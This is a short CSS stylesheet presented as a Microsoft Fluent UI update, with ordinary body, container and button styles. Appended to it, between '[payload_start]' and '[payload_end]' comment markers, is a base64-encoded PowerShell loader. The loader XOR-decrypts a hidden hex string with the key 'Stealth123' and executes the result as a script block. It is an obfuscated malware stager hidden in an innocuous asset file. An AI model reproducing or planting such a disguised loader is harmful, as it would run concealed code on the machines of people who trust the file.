
/* Microsoft Fluent UI CSS – update v10.2025.5.3 */
body {
  font-family: "Segoe UI", system-ui, sans-serif;
  background-color: #f3f3f3;
  color: #1f1f1f;
  font-size: 14px;
  margin: 0;
  padding: 0;
}
.container {
  max-width: 1200px;
  margin: auto;
  padding: 24px;
}
.button {
  background-color: #0078d4;
  border: none;
  color: white;
  padding: 8px 16px;
  font-weight: 500;
  cursor: pointer;
}
.button:hover {
  background-color: #005a9e;
}

/* [payload_start] */
/* RnVuY3Rpb24gZjEgewogICAgcGFyYW0oJGQsJGspCiAgICAkbyA9ICIiCiAgICBmb3IgKCRpPTA7ICRpIC1sdCAkZC5MZW5ndGg7ICRpKz0yKSB7CiAgICAgICAgJGIgPSBbQ29udmVydF06OlRvQnl0ZSgkZC5TdWJzdHJpbmcoJGksIDIpLCAxNikKICAgICAgICAkeCA9IFtieXRlXVtjaGFyXSRrWygkaS8yKSAlICRrLkxlbmd0aF0KICAgICAgICAkbyArPSBbY2hhcl0oJGIgLWJ4b3IgJHgpCiAgICB9CiAgICByZXR1cm4gJG8KfQoKJHh4ID0gIjcwNTQ0N2I0NTA0Mjg0Mzc0Mjk0Nzc0MGE0NzM0NmQ0NDY0NTU0NWM0NTE0M2Y0NTExMTQwNTYyNTExMTcxMjA5NTQxYjU5NTc1ZjNmNTQ0NTQ0NTQ0NWI1NDIxNzQ2YTEzNDZiNTQ0MmE0MjE0NTY0NGM0MmQxMTQwODQwODQxZDQzMzQ1MDQ1ODY2NTAwMDBjMTUwMjZhNDY0YjUwNWE0YzQ2MDExYzAyNjY0NTQyNWE0YzUwMTgwYzA2MDc2NzQwNWU2YjQ4MDA1NTdmNTc0NDdlM2IwNzBiMDkxNzFjMTE3YzU2Mjc1YTM2MGUwZjFmMGQ0NTQxMWQwNzE3MTUyMjAwMWQwZDVmNDYwODU5NTAxMTRmMmYxYjA2NWY1NzUwMjc1YzQxMDk0MDUwMTgxODA5Mzk3NzA3NTg0NTE4NWEyZjU0NDY2MDI3MDYwMDAwMDE1YzQxMGEzODE3MzE0OTJiMDQxYjU5Mjc1MzU4NTYzMDAwNDUwMzE1MDAwZDZhNmYxMzYyNDQ1NzU1NTc3ZTRjNTQwZjdkMzYwMzQ4MmUwZTFlMGQ1MjQ2MTMwMDBkMTYxNTA5MTk0NjY1NTc0YjI3NWEyNDMyMmYzZDIxNzQ1YzUwM2MxMDBjMGYwYjRmNjI0NjVhNWEzZjExNGQ0OTQ4MWQ1NTE1NDExZDAxMTEwNDA1NDQ1MDBhMWQwMjFmNzcxNjRiMmQwOTFhMGY0NTVhMWE3YTU0NDgwZjA5NTQ1ODE4NDkzOTczNTQ0MTA1NTE1MDBkMWY3NTU2MjcyNzExMTMwNTFhMGYxOTE2NTE3ZjQ0NDk0NTA1NWQ1MzNiMTIxMzc3MWI1ODQ5MGYxOTBjMTExZDUwNzM1MDAxNDE1ZTRhNGUwMDEyNGY3MzNiMTAxNTQxMjcxYzQzNWI1ZDM0NWQ1ZTZiNGM1NDRjNDMwZjE3MzY1YTIyMDQxODM2MTE0NTU3NDA3YjUwMGE0ODU3N2U0ODExMTY0MDdkMjMxNzA4MTgxMTQwMTU0MDFmNjM1ODQxMTM0MjM4MGQ1ZjU1NDczYjVkNmYxYzY2NTAxYzFmNzE1ZjNjMDcwMDQ5NDU3ZSIKJGtrID0gIlN0ZWFsdGgxMjMiCiRjYyA9IGYxIC1kICR4eCAtayAka2sKW1NjcmlwdEJsb2NrXTo6Q3JlYXRlKCRjYykuSW52b2tlKCkK */
/* [payload_end] */
